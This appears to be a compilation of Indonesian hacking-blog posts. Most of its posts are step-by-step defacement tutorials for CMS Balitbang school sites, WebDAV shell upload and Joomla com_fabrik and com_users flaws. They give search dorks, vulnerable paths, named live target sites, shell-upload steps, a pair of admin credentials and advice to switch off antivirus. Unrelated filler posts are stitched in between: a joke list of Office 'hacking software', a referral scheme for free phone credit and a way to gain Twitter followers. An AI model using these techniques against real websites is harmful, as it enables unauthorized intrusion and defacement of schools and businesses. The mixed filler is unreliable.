cara deface CMS Balitbang Kemendiknas

CMS Balitbang Kemendiknas 3.42

Sedikit membahas tentang CMS Balitbang, CMS Balitbang adalah salah satu CMS ( Content Management System ) yang sudah siap pakai dan biasanya dipergunakan untuk web sekolah. CMS ini dikembangkan oleh Balitbang Kemendiknas Indonesia.

Namun CMS buatan Indonesia ini masih mempunyai kelemahan/bug. Nah, dalam hal ini saya akan memberi tahu cara menemukan bug itu yang saya kutip dari Inj3ct0r .Mari kita simak secara seksama. Cekibroott !

CMS Balitbang Kemendiknas 3.42

Dork :

inurl:"/html/siswa.php?"
inurl:"/html/alumni.php?"
inurl:"/html/guru.php?"

Exploit :

http://public_html/dir/editor/filemanager/connectors/test.html

1). Masukan salah satu dork diatas untuk mencari bug pada CMS Balitbang
2). Kemudian pilih salah satu website dari hasil pencarian menggunakan dork tersebut

3). Tampilan awal web target.

4). Setelah itu kita masukan exploit untuk CMS Balitbang pada url target di addressbar lalu tekan Enter.

5). Maka nanti tampilannya akan seperti ini :

6). Ubah menu ASP menjadi PHP dan selanjutnya kita pilih file yang akan kita sisipkan kedalam web target.

Catatan :

File yang bisa disisipkan hanya file yang berekstensi .txt

7). Jika file sukses terupload, maka akan tampil seperti dibawah ini.

8). Setelah itu tinggal kita cari file yang disisipkan ke dalam web tersebut dan taraaa...

Catatan :

File akan berada disini, Contoh : http://target.com/userfiles/file/Nama_File.txt

Gimana, mudahkan caranya? Sekian dulu tutorial dari saya kali ini, kalau ada yang bisa edit supaya bisa upload shell.php kasih tau ane yak wkwk :p

Dan saya minta maaf kalau kebanyakan web yang dijadikan target adalah website Indonesia, karena umumnya website-website sekolah di Indonesia menggunakan CMS Balitbang ini :'(

Satu lagi, saya mohon maaf kalo hanya bisa deface tapi tidak bisa patching, soalnya ngga ada yang ngajarin bijimane cara protectnya :'(

Wassalam.

web yg menjadikan anda sebagai hacker

Ok, sekarang kita lanjut ke topik kita hari ini... yaitu tentang Hacking. Bagi kalian yang suka dengan salah satu topik pembahasan utama blog ini, yaitu hacking, dapat mencoba situs yang saya temukan disalah satu thread Forum Hacking Indonesia "Devilzc0de".

Berikut Situs Websitenya :

• [ ./Hacker Typer ]

Tugas kalian hanyalah mengetikan tombol apa saja pada keyboard, secara otomatis kode-kode yang belum kita kenal akan muncul. Background hitam dan font yang berwarna hijau menghiasi website tersebut.

Screenshotnya :

Hacker Typer Screenshot

Hehehe, gimana udah berasa jadi Hacker? yaa... walaupun hanya sebuah rekayasa, tapi yang penting kita udah bisa merasakan jadi seorang hacker :D

Sekian postingan saya kali ini tentang Situs yang Dapat Membuat Kamu Serasa Jadi Hacker, semoga dapat bermanfaat bagi sobat semua.

deface pakai webdav

Cara Deface Website Dengan Webdav Shell Maker | Cirebon-Cyber4rt - Malam sob, ngga terasa sudah lama ngga posting tentang hacking hehee. Ada beberapa hal yang membuat saya vacum dari dunia blog selama hampir 2 bulan ini. Selain jadwal jumpa fans yang padat, saya juga sedang fokus untuk masuk perguruan tinggi.

Webdav Shell Maker

Ok deh langsung saja ke inti postingan kali ini, o'ya! disini saya hanya memberikan tutorial untuk pembelajaran. Bukan sok2'an jadi heker, cracker, ceker atau apalah, saya hanya ingin berbagi karena Berbagi Itu Indah ( Mbah Qopet's Quote ) :p

Dengan menggunakan sebuah tools hacking buatan Hmei7 kita dapat dengan mudah menanam shell ke dalam sebuah website, dan dengan begitu kita dapat melakukan apa saja terhadap web yang kita tanami shell tersebut.

Sebelumnya soba harus mendowload tools Webdav Shell Maker'nya. Dibawah sudah saya siapkan link downloadnya.

Download Link :

• Webdav Shell Maker: Sharebeast | 4Shared | 70KB
• Shell | 10 KB
• Password :   

Tutorial Deface Web dengan Webdav Shell Maker :
1). Download kemudian extract file ls-rootkit.Rar
2). Buka tools webdav yang sudah di download tadi, klik menu tab 'WebDav' lalu pilih 'Asp shell maker'.

3). Buka menu Setting, pada menu setting Name of your shell bisa diubah dengan nama kamu, kemudian Load Shell from file, pilih shell Umer.asp;

4). Selanjutnya, pilih Add site, disini saya menggunakan target http://fpzbtc.com/ lalu klik OK.

5). Klik Serang !!!, lalu tunggu hingga scanning web selesai, jika shell berhasil tertanam, tampilannya akan seperti ini, klik OK.

6). Block http://fpzbtc.com/Cirebon.asp;.txt lalu Copy dan Pastekan pada Addressbar Browser kalian, kemudian tekan Enter.

7). Jika sudah masuk website target, klik UPLOAD FILE TO Blablabla,

8). Pilih scipt .html deface'an kamu, kemudian klik Upload!

9). Tahap akhir, copy file .html yang sudah kamu upload tadi lalu pastekan dibelakang Url website target.

10). Enter dan lihat hasilnya!

http://fpzbtc.com/3xpl0iter.html

Jika ingin mendeface seluruh halaman, kamu tinggal RENAME file kamu dengan Index.html, atau istilahnya tukar-menukar file .html ( Cari file bernama Index.html atau sejenisnya, delete file tersebut lalu Rename file upload'an kamu menjadi Index.html ) Gimana, ngerti ngga? harus ngerti!

Kalo menurut saya jangan nyerang Index nya deh, kasian adminnya... mending nitip file .html aja, kalo emang kamu hati nurani :p

Tidak semua website rentan atau mempunyai celah/vuln, jadi kalo belum berhasil... cari website lain yang bisa ditanami shell dengan tools ini, jika ingin praktis berikut List Website Vuln Terhadap WebDav. Jika masih ada yang belum dipahami, kalian bisa hubungi via facebook atau mention twitter saya.

Catatan:

Matikan Anti-virus ketika mendownload dan pada saat menggunakan tools WebDav ini, Anti-virus mendeteksi tools ini sebagai virus.

Sekian postingan saya kali ini tentang Cara Deface Website Dengan Webdav Shell Maker | Hmei7 semoga dapat bermanfat bagi kalian, wassalam.

6 software hacker

1.Microsoft Office Word 2003 untuk mengetik dan menyimpan data- data yang nantinya akan digunakan    dalam membantu Anda meng-HACKING

2.Microsoft Office Excel 2003 untuk membuat data- data berupa tabel yang mempermudah Anda melacak kode- kode yang sulit dilacak (hanya HACKER yang dapat melacaknya).

3.Microsoft Office Visio 2003 untuk mempermudah Anda (HACKER) dalam merancang modul peng-HACKING-an data.

4.Microsoft Office Publisher 2003 untuk membantu Anda (HACKER) dalam mem-publish-kan data- data yang telah di-HACK.

5.Microsoft Office PowerPoint 2003 untuk membuat slide mengenai data- data yang akan dan telah Anda HACK.

6.Microsoft Office FrontPage 2003 untuk membantu Anda agar sistem peng-HACKING-an menjadi lebih mudah.

Kata / SELAMAT DATANG DI BLOG SAYA Dr.Death_03

pulsa gratis dari internet

Pulsa Gratis Dari Internet Untuk Semua Operator! mungkin saya tidak perlu panjang lebar lagi untuk menjelaskan maksud dari judul artikel ini, ya karena saya yakin anda pun pasti sudah mengetahui maksudnya. Jika pada artikel-artikel sebelumnya saya selalu menulis artikel tentang blogging, SEO, ataupun software full version, maka lain halnya dengan sekarang. Karena pada kesempatan ini saya akan berbagi informasi mengenai bagaimana cara mendapatkan pulsa gratis dari internet untuk semua operator. Mungkin info ini sudah terbilang basi, tapi itu tidak masalah yang penting tujuan saya disini adalah hanya sekedar ingin berbagi informasi yang mungkin dapat bermanfaat bagi anda.

Untuk mendapatkan pulsa gratis, ada beberapa hal yang harus kita lakukan yaitu mendaftar di situs www.mcent.com, caranya adalah sebagai berikut :

---

1. Silahkan kunjungi www.mcent.com atau bisa juga klik disini!

---

2. Kemudian masukkan nomor Hp anda beserta kode negara anda, caranya adalah sebagai berikut :

---

misalnya anda punya no Hp : 087722051234 jadi yang harus anda lakukan adalah mengganti angka 0 didepan angka 8 dengan angka 62. misalnya ubah no : 087722051234 menjadi 628722051234. Setelah itu klik "DAPATKAN RP200,00 SEKARANG"

---

3. Kemudian anda akan menerima SMS yang berisi kode verfikasi dari mcent.com. Kemudian masukan kode tersebut lalu klik "Lanjutkan" :

---

4. Kemudian pilih data sesuai data diri anda :

---

5. Kemudian pilih provinsi tempat dimana anda tinggal :

---

6. Selanjutnya masukan kata sandi dan alamat email anda :

---

7. Kemudian klik "Selesai"

---

8. Karena mcent.com sedang mengadakan program undian pulsa, silahkan anda klik "Ikuti untuk memenangkannya"

---

9. Lalu, masukan nama depan dan nama belakang anda, kemudian klik "Tekan"

---

10. Kemudian anda akan mendapatkan refferal link yang dapat anda gunakan untuk mengajak orang lain bergabung :

---

Keterangan gambar :

1. Link refferal anda : http://mcent.com/ref/WXXBWL/
2. Share link refferal anda ke facebook
3. Share link refferal anda via twitter

---

Sampai disini sebenarnya sudah selesai, sekarang tugas anda adalah mengajak orang lain bergabung di mcent.com dengan menggunakan link refferal anda. Semakin banyak orang yang anda ajak, maka semakin banyak pulsa yang akan anda dapatkan secara gratis tentunya hehe. Atau jika anda mau berbaik hati menjadi refferal saya, silahkan anda daftar melalui link refferal saya berikut ini :

http://mcent.com/ref/R3DBJ0/

---

Demikian info menarik mengenai "Pulsa Gratis Dari Internet Untuk Semua Operator! Mau?" walaupun sederhana tapi mudah-mudahan dapat memberikan manfaat. Terimakasih

Memperbanyak Follow Twitter Terbaru 2013

Memperbanyak Follow Twitter Terbaru 2013 - Setalh pada artikel sebelumnya saya sudah berbagi tips mengenai bagaimana cara mendapatkan PageRank, pada kesempatan ini saya ingin berbagi salah satu tips menarik yang sedang populer khususnya untuk kalangan remaja. Twitter! Yup itulah istilah yang barangkali sudah tidak asing lagi ditelinga kita. Mulai dari anak-anak, dewasa, orang tua bahkan kakek-kakek atau nenek-nenekpun juga banyak yang sudah mempunyai akun twitter. 

Bicara soal twitter, akhir-akhir ini banyak para remaja yang ingin mendapatkan followe twitter yang banyak dengan cara yang instan. Namun setelah saya cek, ternyata cara yang mereka lakukan itu kurang baik karena. Alasannya karena biasanya cara yang mereka lakukan adalah dengan bergabung dengan situs SPAMMER. Selain merugikan, follower yang kita dapat dari situs spammer tidak akan bertahan lama dan akan langsung men-unfollow kita. Oleh karena itu disini saya akan coba menjelaskan bagaimana cara mendapatkan banyak follower dengan target dan minat tertentu. Penasaran? Ok lanjut baca!!!

Cara Memperbanyak Follower Twitter 

---

1. Silahkan anda kunjungi situs www.twitclub.com atau bisa juga klik disini

---

2. Kemudian anda akan dibawa ke halaman situs twitclub dan anda akan menemukan daftar grup twitter seperti yang terlihat dibawah ini. Selanjutnya anda klik "View Club"

---

3. Kemudian klik Login via Twitter

Setelah anda login, anda akan diberikan 300 poin oleh situs twitclub. Dari 300 poin tersebut kita dapat memfollow orang lain sebanyak 30 Follow, karena 1x follow menghabiskan 10 poin.

---

4. Kemudian anda akan menemukan banyak akun twitter milik orang lain, nah tugas anda disini andalah memfollow mereka. Karena setiap akun twitter yang anda follow akan secara otomatis mem-follow akun twitter anda.

---

5. Selesai hehe

---

Oh iya, jangan lupa untuk bergabung di grup follower saya ya klik : www.twitclub.com/Persatuan-Blogger-Indonesia/

---

Saya juga sudah mencoba cara ini dan hasilnya lebih efektif  jika dibandingkan denga menggunakan layanan situs spammer karea di twitclub kita bisa mencari orang-orang dengan minat yang sama misanya : ( komunitas blogger, android lover dsb

4 cara menjadi hacker

Ketika membaca tulisan saya sebelumnya tentang 6 hacker paling top sedunia, banyak orang mungkin berpikir kalau mereka itu adalah orang-orang yang jenius. Tidak bisa kita pungkiri kalau bakat dan talenta itu memang sesuatu yang penting. Ada beberapa orang yang dilahirkan dengan kemampuan yang di atas rata-rata. Tapi tahukah kita kalau para ahli itu, termasuk hacker, dibuat bukan dilahirkan? Seorang hacker hadir dari proses belajar, seorang hacker tidak lahir dan langsung menjadi hacker. Ada tahapan yang harus dilalui, ada attitude yang harus dipunyai, ada kemampuan yang harus diraih sehingga seseorang diakui sebagai hacker.

Mungkin banyak juga yang penasaran bagaimana caranya menjadi seorang hacker? Apa saja yang harus dipelajari dan dimiliki seorang hacker? Setidaknya 4 cara untuk menjadi seorang hacker yang akan saya ungkapkan dalam artikel ini mungkin dapat sedikit menjawab rasa penasaran tersebut. Dan sebagai catatan, saya tidak sedang berusaha sok pintar atau ingin menggurui sobat dblogger. Saya juga bukan seorang hacker. Apa yang ada dalam tulisan ini adalah hasil rangkuman dari tulisan salah satu hacker yang ada dalam daftar 6 hacker top sedunia, yaitu Eric S Raymond. Okay, let’s check this out!

1. Berpikirlah Seperti Seorang Hacker

Bagaimana seorang hacker berpikir? Apa yang ada di otak seorang hacker? Seorang hacker selalu memikirkan bagaimana caranya menyelesaikan suatu masalah dan bagaimana caranya membuat sesuatu. Seorang hacker juga sangat menghargai kebebasan dan mau menolong dengan sukarela. Kalau ingin menjadi hacker, seseorang harus memiliki attitude ini.

Dunia ini dipenuhi berbagai permasalahan yang sangat menarik untuk diselesaikan. Dengan mencoba menyelesaikan permasalahan-permasalahan ini, seseorang akan mempertajam kemampuan dan melatih kecerdasannya. Ingat juga bahwa suatu permasalahan tidak perlu diselesaikan lebih dari sekali. Oleh karena itu jangan pernah merasa enggan untuk membagikan informasi dan solusi terhadap suatu permasalahan. Ini adalah tanggung jawab moral seorang hacker.

Budaya hacker adalah suatu budaya tentang pengakuan. Seseorang tidak dapat menyebut dirinya sendiri sebagai hacker. Seseorang tidak akan pernah benar-benar menjadi hacker sampai orang lain (para hacker) menyebutnya sebagai hacker. Untuk mendapatkan pengakuan ini tentu saja butuh usaha, kerja keras, dan kontribusi kepada komunitas. Beberapa hal yang dapat dilakukan untuk berkontribusi kepada komunitas:

• Buatlah perangkat lunak (program) open source.
• Investasikan waktu luang untuk membantu memperbaiki perangkat lunak open source dengan melakukan debugging.
• Publikasikan informasi yang berguna.
• Berikan bantuan untuk menjaga infratstruktur tetap berjalan.

2. Pelajari Pemrograman

Pelajarilah bagaimana caranya menulis program. Untuk benar-benar menjadi seorang hacker kemampuan pemrograman sangatlah penting. Para hacker menyelesaikan berbagai permasalahan yang mereka temui dengan menulis program. Cara paling mudah untuk mempelajari cara menulis program adalah dengan membaca dokumentasi yang ditulis oleh para masternya. Kemudian cobalah menulis program sedikit demi sedikit. Teruslah berlatih untuk mencapai suatu level kemampuan pemrograman yang cukup baik. Jika sudah cukup percaya diri dengan suatu bahasa pemrograman, cobalah untuk mempelajari bahasa pemrograman lainnya. Mempelajari beberapa bahasa pemrograman akan mengajarkan kita memandang suatu permasalahan dari sisi lain.

3. Kenali dan Gunakan Unix/Linux

UNIX dan sistem operasi yang mengadopsi konsep yang sama seperti Linux dan BSD adalah sistem operasi utama Internet. Namun untuk menggunakan UNIX seseorang mungkin harus mengeluarkan uang dalam jumlah yang cukup besar. Solusinya adalah menggunakan sistem operasi yang open source seperti GNU/Linux (dengan berbagai pilihan distribusi) dan FreeBSD (dan turunan BSD lainnya). Pelajarilah Linux, gunakan distro yang mudah dan ramah untuk pemula seperti Ubuntu. Pasanglah sistem operasi ini di PC atau laptop dan gunakan untuk bekerja/bermain sehari-hari.

Mungkin sebagian orang akan berpikir mengapa harus menggunakan Unix/Linux/FreeBSD? Apakah tidak bisa menggunakan sistem operasi lain? Sistem operasi tertutup seperti Microsoft Windows dan Mac OS tidak akan mengizinkan seseorang untuk mempelajari kode sumbernya apalagi melakukan modifikasi. Belajar menjadi hacker menggunakan sistem operasi seperti itu ibarat belajar menari dengan tubuh dicor.

4. Pelajari HTML

HTML adalah mainan hacker yang telah mengubah dunia. Belajarlah bagaimana cara menggunakan World Wide Web dan menulis kode HTML. Menggunakan Word Wide Web bukan berarti sekedar menggunakan browser dan berselancar di dunia maya melainkan bagaimana caranya membangun suatu situs menggunakan bahasa penanda web (web markup language). Cobalah membangun home page menggunakan sintaks-sintaks HTML.

Sudah siap menjadi seorang hacker sobat dblogger?

Referensi:

1. Hacker howto
2. Become a hacker

Sumber gambar: ohinternet.com

Exploit Joomla COM_FABRIK | Upload Vulnerability

Bismillahirrahmanirrahim

Assalamualaikum sobat 207cs, apa kabarnya nih ? maaf ya jarang update, lagi asik liburan soalnya. kwkwkwk

     Oh ya, disini saya jelaskan sedikit ya tentang exploit. Saya sih belum tau arti lengkapnya, tapi secara singkatnya itu exploit dapat diartikan sebagai sebuah kode yang menyerang keamanan

Sekarang kita praktek, tapi ada syaratnya :p . Anda harus berusaha untuk mencapainya, jangan langsung nanya sebelum baca. Oke ! Lansung ke TKP.

1. Copas dork ini ke google [dork bisa dikembangkan]

inurl:index.php?option=com_fabrik

 2. Ceritanya kita sudah mendapat si target

http://ar.librodar.com.ar/index.php?option=com_fabrik

3. Maka pastekan Vulnerable path nya di belakang Url, Vulnerable path nya adalah ini :

index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

4. Maka akan jadi seperti ini

http://ar.librodar.com.ar/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

5. Langsung saja upload file, gak perlu dicentang kok ;) . Oh ya filenya bisa bertipe

php,asp,html,jpg

6. Sudah ? nah sekarang kita akses shellnya di

http://localhost.com/media/shell.php

Kalo tipe .php gabisa ya terpaksa dengan tamper data :D 

Live Target : http://ar.librodar.com.ar/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

Sekian tutorial nya semoga bermanfaat kalau ada salah salah kata mohon dimaafkan

Wabillahittaufiq Wassalamualaikum Warahmatullahiwabarokatuh

Cara Deface Dengan Teknik Exploit Joomla | Com_User

Assalamualaikum....

ehm,, jumpa lagi nih dengan coretan2 semerawut ane tapi ngangenin untuk dibaca,, wkkwkwk yo dah, dah pasti pada ga sabar kan udah nunggu dari kemaren?? wkwkwk langsung daaahh :p

Silahkan tutorial ini di baca dulu baik2, dipahami dan dipelajari, baru dah sobat praktekin :p kalo seandainya gagal, itu karena website udah di patch :p

"Talk Less Do More!" :p

oke dah simak nih! sebelumnya download dulu bahan2nya :p

1. Download : Exploit Joomla.html    Password: Lihat

2. Titip Nama : Indonesian Cyber Army

Note: "Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"

Langkah Langkah::

1. Cari web target di Google.com dengan memasukkan Dork berikut:

intext:Joomla! is a flexible and powerful platform, whether you are building a small site for yourself or a huge site with hundreds of thousands of visitors site:com

#Dork Kembangin Sendiri :p

2. Pilih target sobat, lalu masukin exploit berikut:

index.php?option=com_users&view=registration

3. Ane disini mengambil contoh:

http://mobile.resto-lincontournable.com/index.php/utiliser-joomla/utiliser-extensions/composants/composant-flux-rss/un-flux-rss

4. kemudian ane ganti menjadi:

http://mobile.resto-lincontournable.com/index.php?option=com_users&view=registration

5. Setelah itu klik kanan>klik View Page Source atau bisa juga tekan tombol keyboard CTRL+U

kalo sudah muncul page sourcenya, lalu tekan tombol CTRL+F atau klik menu Find ketik hidden. cari seperti kode berikut:

6. Copy kode tersebut, lalu buka Exploit Joomla.html yang udah sobat download tadi dengan Notepad, lalu pastekan kode tersebut, dan masukkan juga site target dan Email sobat! liat gambar !

7. Lalu Save! Setelah itu buka file Exploit Joomla.html nya, Klik Register!

8. Setelah itu akan muncul peringatan bahwa password harus diisi sama! Masukkan password sobat!

9. Setelah password diisi, klik Register! lalu buka email sobat dan klik link Konfirmasinya!

10. Lalu masuk kehalaman admin login nya! 

http://mobile.resto-lincontournable.com/administrator

11. Masukkan Username & Passwordnya! lalu klik Login! kalo contoh disini:

Username:genesis
Password:onix

Tararaaaaaaaaaaaaaa!! Sobat masuk sebagai admin! trus tebas deh index nya :p Liat Cara Tebas Index

Goodluck!!! :p

udah gitu aja! Salam........ :p